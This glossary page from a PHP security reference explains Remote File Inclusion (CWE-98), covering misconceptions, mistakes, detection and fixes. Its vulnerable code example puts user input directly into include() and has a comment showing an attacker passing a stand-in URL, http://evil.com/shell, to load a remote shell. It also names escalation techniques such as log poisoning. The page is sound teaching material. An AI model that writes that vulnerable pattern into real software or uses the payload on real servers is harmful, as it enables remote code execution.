CodeClarityLab / Glossary
Ctrl K
← Home ← Codex ← DEBT
Browse by Category
+ added · updated 7d
Pages
Terms of Use About Contribute 🧠Logic graph Contact
← Back to glossary

Remote File Inclusion (RFI)

Security CWE-98 OWASP A3:2021 CVSS 9.8 PHP 5.0+ Intermediate
debt(d5/e3/b3/t7)
d5 Detectability Operational debt — how invisible misuse is to your safety net

Closest to 'specialist tool catches it' (d5). The detection_hints list semgrep, lynis, and phpstan — all specialist/SAST tools. The pattern (user-controlled input in include/require paths, allow_url_include=On) is not caught by default linters but is detectable with these dedicated static analysis tools. Runtime exploitation may be silent in production without active scanning.

e3 Effort Remediation debt — work required to fix once spotted

Closest to 'simple parameterised fix' (e3). The quick_fix states: set allow_url_include=Off in php.ini, which is off by default since PHP 5.2 — a single config change. However, common_mistakes reveal additional work: replacing user-controlled paths in include/require calls, fixing path traversal filtering, and using realpath() for whitelist validation. This elevates the fix slightly beyond a one-liner to a small but focused remediation pattern within one component/config scope.

b3 Burden Structural debt — long-term weight of choosing wrong

Closest to 'localised tax' (b3). The vulnerability applies specifically to PHP web contexts where user input reaches include/require. Once allow_url_include is disabled and include paths are hardened, the burden is contained to the affected file inclusion logic rather than spreading across the entire codebase. It doesn't fundamentally reshape architecture.

t7 Trap Cognitive debt — how counter-intuitive correct behaviour is

Closest to 'serious trap' (t7). The misconception field states that developers believe allow_url_include=Off fully prevents file inclusion attacks, but it only prevents RFI — LFI remains possible and can itself lead to RCE via log poisoning or session file inclusion. This directly contradicts a reasonable developer assumption that disabling one setting closes the entire vulnerability class, making it a serious cognitive trap.

About DEBT scoring → scored by claude-sonnet-4-6 · 2026-05-07 · reviewed by human

Also Known As

RFI Remote File Inclusion remote include

TL;DR

An attacker tricks include() or require() into loading a PHP file from an attacker-controlled remote URL, achieving code execution.

Explanation

RFI is enabled by allow_url_include=On (disabled by default since PHP 5.2) and user-controlled include paths. An attacker supplies a URL pointing to a remote PHP file they control — the server fetches and executes it with full server privileges. Even with allow_url_include=Off, LFI can escalate to code execution via log poisoning, PHAR injection, or /proc/self/environ. Prevention: always disable allow_url_include, never pass user input to include/require, use a whitelist of permitted file identifiers, and validate paths with realpath() against an allowed prefix.

Common Misconception

allow_url_include = Off fully prevents file inclusion attacks. It prevents remote URL inclusion but not local file inclusion (LFI) — and LFI can itself lead to RCE via log poisoning or PHP session file inclusion.

Why It Matters

Fetching a remote PHP file via include() gives the attacker full code execution; even local file inclusion can expose source code or log-poisoning chains.

Common Mistakes

  • Using user input directly in include(), require(), or include_once() paths.
  • Leaving allow_url_include = On in php.ini — this enables RFI entirely.
  • Path traversal filtering that misses double-encoded sequences like ..%2F.
  • Using a whitelist of partial filenames without verifying the full resolved path via realpath().

Code Examples

✗ Vulnerable 
include($_GET['page'] . '.php'); // attacker passes http://evil.com/shell
✓ Fixed 
$allowed = ['home', 'about', 'contact'];
$page = in_array($_GET['page'], $allowed) ? $_GET['page'] : 'home';
include __DIR__ . '/pages/' . $page . '.php';
Added 15 Mar 2026
Edited 22 Mar 2026
Views 62

Curated in Warsaw under one editorial standard. 1,506 terms, single voice.  About this reference →

Rate this term
No ratings yet
🤖 AI Guestbook educational data only
| |
Last 30 days
0 pings T 0 pings W 1 ping T 0 pings F 0 pings S 1 ping S 0 pings M 0 pings T 0 pings W 1 ping T 0 pings F 0 pings S 2 pings S 1 ping M 0 pings T 2 pings W 0 pings T 1 ping F 0 pings S 0 pings S 0 pings M 0 pings T 0 pings W 0 pings T 0 pings F 0 pings S 1 ping S 1 ping M 0 pings T 0 pings W
Agents 0
No pings yet today
No pings yesterday
Amazonbot 9 ChatGPT 6 Scrapy 6 SEMrush 5 Ahrefs 4 Google 3 Perplexity 3 Unknown AI 2 Majestic 1 Claude 1 Bing 1 Meta AI 1 PetalBot 1
Also referenced
allow_url_fopen / allow_url_include 148 php.ini Security Settings 87 Local File Inclusion (LFI) 70 Path Traversal 67
How they use it
crawler 39 crawler_json 3 pre-tracking 1
Related categories
php 13.2k security 8k
DEV INTEL Tools & Severity
🔴 Critical ⚙ Fix effort: Low
⚡ Quick Fix
Set allow_url_include=Off in php.ini (it's off by default since PHP 5.2) — remote file inclusion is only possible if this setting is enabled, so disabling it prevents the entire class of attacks
📦 Applies To
PHP 5.0+ web
🔗 Prerequisites
🔍 Detection Hints
allow_url_include=On in php.ini; include or require with user-controlled URL; including remote scripts
Auto-detectable: ✓ Yes semgrep lynis phpstan
⚠ Related Problems
🤖 AI Agent
Confidence: High False Positives: Low ✗ Manual fix Fix: High Context: Function Tests: Update
CWE-98 CWE-829
✓ schema.org compliant